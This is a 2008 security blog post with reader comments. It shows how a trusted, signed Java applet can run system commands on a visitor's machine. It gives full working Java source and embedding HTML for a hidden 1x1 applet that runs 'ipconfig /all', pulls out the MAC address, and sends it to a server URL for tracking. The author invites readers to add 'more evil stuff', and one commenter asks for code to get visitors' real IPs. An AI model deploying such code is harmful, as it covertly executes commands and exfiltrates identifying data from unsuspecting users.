Trusting Java Applets

Posted: October 28, 2008 in security
Tags: , , , ,

It’s been blogged before but oh well I always learn by example so here is an example. The thing I’m talking about is trusting signed java applets. In short when you trust a java applet it can do whatever it wants. So what could you do with a java applet? The java source code will steal your mac address, rather useless but it serves the example purpose good enough. The stolen mac address get’s submitted to a page in this case it will be google which will look like this:

http://www.google.com/bleh=00-0C-29-F6-E2-A8

So on the serverside you can just match ip + mac address and build yourself a (maybe) useless database. you could also make some code which does more evil stuff instead of just steal the mac address.

Are you wondering how to sign an java applet? visit the following url:

http://java.sun.com/j2se/1.5.0/docs/guide/plugin/developer_guide/rsa_signing.html

The html code to embed the applet in your html page is as follow:

<HTML>
<HEAD>
<TITLE&gt;Get MacAddress Applet&lt;/TITLE>
</HEAD>
Get MacAddress applet<BR>
<applet code="GetMacAddress.class" archive="GetMacAddress.jar" width=1 height=1>
<PARAM NAME="BASEURL" VALUE="http://www.google.com/bleh=">
</applet>
</BODY>
</HTML>

So now for the example code of the “evil” applet.

import java.applet.Applet;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URL;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * This applet gets the mac address from a windows machine
 * @author DiabloHorn
 */
public class GetMacAddress extends Applet {

    /** Creates a new instance of GetMacAddress*/
     public void init() {
         try{
            String macAddress = this.getMacAddress();
            URL url = new URL(this.getParameter("BASEURL")+macAddress);
            getAppletContext().showDocument(url, "_self");
         }catch(Exception e){
             System.out.println(e);
         }
     }

    public String getMacAddress() throws IOException {
        String macAddress = null;
        String command = "ipconfig /all";
        Process pid = Runtime.getRuntime().exec(command);
        BufferedReader in = new BufferedReader(new InputStreamReader(pid.getInputStream()));
        while (true) {
            String line = in.readLine();
            if (line == null) {
                break;
            }

            Pattern p = Pattern.compile(".*((:?[0-9a-f]{2}[-:]){5}[0-9a-f]{2}).*",Pattern.CASE_INSENSITIVE);
            Matcher m = p.matcher(line);
            if (m.matches()) {
                macAddress = m.group(1);
                break;
            }
        }
        in.close();
        return macAddress;
    }
}
Advertisements
Comments
  1. […] can also abuse the trust Java places in digitally signed code, I’ve blogged about this issue before. Nowadays metasploit/SET even has a ready to use module for it. If you are wondering what all this […]

  2. diablohorn says:

    If you modify the command it might work yes, I haven’t had the time to test it out. My point was more about signed applets and the endless possibilities.

  3. Aden says:

    Hi!
    As far as I know, “ipconfig /all” is for MS Windows. So do you think this applet will be works on the client running linux?

    Please answer me.

  4. wong says:

    Hi,

    Do you have java/applet code that can get the real ip? Thanks…

    Regards,

    Wong

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s